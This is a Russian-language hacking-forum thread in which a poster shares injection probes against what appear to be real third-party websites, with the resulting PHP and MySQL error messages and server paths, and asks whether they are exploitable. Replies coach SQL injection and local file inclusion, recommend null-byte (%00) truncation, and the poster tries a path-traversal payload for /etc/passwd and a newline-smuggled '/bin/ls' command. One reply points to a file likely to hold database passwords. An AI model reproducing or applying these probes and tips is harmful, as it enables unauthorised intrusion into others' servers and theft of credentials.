Помощь по SQL & PHP
 

В общем если такие ошибки возможен ли тут sql иньекция ?

1,
ndex.php?ID=-1'1699&CATEGORY=0-N-1'ews

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/sfl1/domains/2uk/public_html/story2.php on line 12

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in
/home/sfl1/domains/2uk/public_html/story2.php on line 17

*******************************************
2,

ain.php?pid=?Qalias=x%0a/bin/ls%20/

Warning: main(pages/?Qalias=x /bin/ls /.php): failed to open stream: No such file or directory in /var/www/clients/jus/main.php on line 97

Warning: main(): Failed opening 'pages/?Qalias=x /bin/ls /.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/clients/just/main.php on line 97

********************************************

3,

/index.htm?id=-1'2518
Fatal error: Call to undefined method DB_Error::fetchInto() in /var/www/html/core/lib/classes/GO_DbObj.php on line 536
********************************************
?_m=news&_a=viewnews&newsid=-1'
Fatal error: Invalid News Item in /home/wwwdkho/public_html/support/modules/news/client_news.php on line 102
*********************************
4.


ndex.php?id='company/services


Warning: main(content/\'company/services.txt) [function.main]: failed to open stream: No such file or directory in /home/wav/public_html/index.php on line 186

Warning: main(content/\'company/services.txt) [function.main]: failed to open stream: No such file or directory in /home/wav/public_html/index.php on line 186



******************************************
И напоследок вот такое

/index.php?id_page=-1

При значение -1
Некаких ошибок нету. Просто Появлятеся белая страница ( инечегона ней нету)

**********************************

1. возможно sql-inj. По крайне мере раскрытие серверного пути на лицо :)
2. возможно php-incude. Эххх.. попробовал бы %00, ain.php?pid=php-include вроде так.
3. вряд ли скуль.. просто ошибка в обработке данных. Но также во втором случае не исключена возможность sql-inj.
4. чистой воды локальный инклуд. Пробуй отсечь расширения - %00

про "напоследок".. это просто реакция такая на "плохой" параметр...скуль возможна.

Сенк. Сейчас буду пробывать

только локальный инклюд из /pages. %00 уместен.

3. Вызов неопределенного метода класса. При возможности глянуть на сам класс GO_DbObj.php

А где можно поподробнее почитать про локальные инклюды?

Чтото инфы я так и ненашёл. а по мускульным инклюдам врое достаточно

Во вотором примере пробывал вот так

main.php?pid=?../../../../../../../etc/passwd%00

Warning: main(pages/?../../../../../../../etc/passwd\0.php): failed to open stream: No such file or directory in /var/www/clients/juааlar/main.php on line 97

значит %00 отпадает.. во-первых, убери вопросительный знак -) а во вторых пробуй разные пхп-файлы втсавлять без расширения пхп.. без ссылки сложно судить.. может даже там ниче и нет интересного

Можеш плиз в аську стукнутся 491104

можно инклудить токо то что в папке pages/

про локальные инклуды можешь почитать здесь http://forum.antichat.ru/threadnav22832-1-10.html
в 4 случае ты можешь просмотреть services.txt, вероятнее всего там php код. возможно там есть ошибки или пароли к бд.